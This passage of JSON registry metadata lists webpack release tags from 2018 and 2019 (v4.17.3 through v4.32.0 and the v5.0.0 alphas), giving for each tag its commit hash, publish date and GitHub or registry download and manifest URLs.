,"html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/